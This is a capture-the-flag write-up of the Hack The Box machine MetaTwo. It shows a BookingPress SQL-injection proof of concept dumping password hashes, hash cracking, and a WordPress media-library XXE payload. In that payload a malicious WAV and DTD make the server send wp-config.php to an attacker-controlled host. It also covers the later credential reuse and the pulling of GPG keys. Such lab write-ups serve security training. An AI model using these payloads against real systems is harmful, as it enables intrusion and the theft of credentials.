MetaTwo - HTB - Write-up¶
Nmap Scan:
┌──(root㉿kali)-[/home/…/Documents/ctf/htb/metatwo]
└─# nmap -sV -sC -O -T4 -n -Pn -oA fastscan 10.129.25.21
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-31 14:52 EST
Nmap scan report for 10.129.25.21
Host is up (0.033s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp?
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 c4b44617d2102d8fec1dc927fecd79ee (RSA)
| 256 2aea2fcb23e8c529409cab866dcd4411 (ECDSA)
|_ 256 fd78c0b0e22016fa050debd83f12a4ab (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to http://metapress.htb/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=12/31%OT=21%CT=1%CU=43799%PV=Y%DS=2%DC=I%G=Y%TM=63B093
OS:DB%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST
OS:11NW7%O6=M539ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)EC
OS:N(R=Y%DF=Y%T=40%W=FAF0%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 240.03 seconds
We see a http server and failed redirect to metapress.htb.
┌──(root㉿kali)-[/home/…/Documents/ctf/htb/metatwo]
└─# dirsearch -u http://metapress.htb -t 100 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
Check around the website we see a couple different things but, nothing of much value. We can play around with the events page and just see what it does. Taking a look at the source code ctrl+u we can see the plugins being used. Let's see what exploits come up for it.
Load msfconsole and search bookingpress. Looks like just one hits. Let's info on it.
┌──(root㉿kali)-[/home/…/ctf/htb/metatwo/CVE-2022-0739]
└─# python3 booking-press-expl.py -u http://metapress.htb -n d0224b776d
- BookingPress PoC
-- Got db fingerprint: 10.5.15-MariaDB-0+deb11u1
-- Count of users: 2
|admin|admin@metapress.htb|$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.|
|manager|manager@metapress.htb|$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70|
┌──(root㉿kali)-[/home/…/Documents/ctf/htb/metatwo] └─# john -w=/usr/share/wordlists/rockyou.txt hashfile
Let's try it out on the ftp server we found earlier
┌──(root㉿kali)-[/home/…/Documents/ctf/htb/metatwo]
└─# ftp ftp://manager:partylikearockstar@10.129.15.139 21
Connected to 10.129.15.139.
220 ProFTPD Server (Debian) [::ffff:10.129.15.139]
331 Password required for manager
530 Login incorrect.
ftp: Login failed
ftp: Can't connect or login to host `10.129.15.139:ftp'
221 Goodbye.
No luck.
There was a dashboard page. Let's give it a shot.
We were able to log into it. Digging around we find a place to upload media. We can check the info of the page and also use Wappalyzer to grap the specific version of WordPress.
Doing some recon on this version and what we see about a section in the Library called Media Upload. I came accross a nice walkthrouhg and a CVE. https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/
We first need to create a evil.dtd with the below information inside.
┌──(root㉿kali)-[/home/…/ctf/htb/metatwo/CVE-2021-29447]
└─# cat malicious.wav
RIFF�WAVEiXML{<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM 'http://10.10.14.34:8001/evil.dtd'>%remote;%init;%trick;] >
┌──(root㉿kali)-[/home/…/ctf/htb/metatwo/CVE-2021-29447]
└─# cat evil.dtd
" >
We can upload it to the interface and get a base64'd output.
We can use the below to get info.
It shows us that we were able to pull the etc/passwd file. We know the website is using Nginx. So we could pull out the nginx config and gather some more information.
Refactor our evil.dtd
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/var/www/metapress.htb/blog/wp-config.php">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.14.34:8001/?p=%file;'>" >
That one had a lot of creds in it.
┌──(root㉿kali)-[/home/…/ctf/htb/metatwo/CVE-2021-29447]
└─# ftp ftp://metapress.htb@10.129.15.139 21
We were able to get in and do some digging and found some more creds. I didnt see an email login anywhere but, let's give it a shot on the ssh port.
Well that worked out.
jnelson@meta2:~$ ls -la
total 32
drwxr-xr-x 4 jnelson jnelson 4096 Oct 25 12:53 .
drwxr-xr-x 3 root root 4096 Oct 5 15:12 ..
lrwxrwxrwx 1 root root 9 Jun 26 2022 .bash_history -> /dev/null
-rw-r--r-- 1 jnelson jnelson 220 Jun 26 2022 .bash_logout
-rw-r--r-- 1 jnelson jnelson 3526 Jun 26 2022 .bashrc
drwxr-xr-x 3 jnelson jnelson 4096 Oct 25 12:51 .local
dr-xr-x--- 3 jnelson jnelson 4096 Oct 25 12:52 .passpie
-rw-r--r-- 1 jnelson jnelson 807 Jun 26 2022 .profile
-rw-r----- 1 jnelson jnelson 33 Jan 2 04:02 user.txt
jnelson@meta2:~$ cd .passpie/
jnelson@meta2:~/.passpie$ ls
ssh
jnelson@meta2:~/.passpie$ ls -la
total 24
dr-xr-x--- 3 jnelson jnelson 4096 Oct 25 12:52 .
drwxr-xr-x 4 jnelson jnelson 4096 Oct 25 12:53 ..
-r-xr-x--- 1 jnelson jnelson 3 Jun 26 2022 .config
-r-xr-x--- 1 jnelson jnelson 5243 Jun 26 2022 .keys
dr-xr-x--- 2 jnelson jnelson 4096 Oct 25 12:52 ssh
jnelson@meta2:~/.passpie/ssh$ ls -la
total 16
dr-xr-x--- 2 jnelson jnelson 4096 Oct 25 12:52 .
dr-xr-x--- 3 jnelson jnelson 4096 Oct 25 12:52 ..
-r-xr-x--- 1 jnelson jnelson 683 Oct 25 12:52 jnelson.pass
-r-xr-x--- 1 jnelson jnelson 673 Oct 25 12:52 root.pass
We can pull out the keys we found for potentially root.
scp jnelson@10.129.228.95:.passpie/.keys .keys
Remove the two public keys from the file.
Put in a john format gpg2john .keys > gpg.john
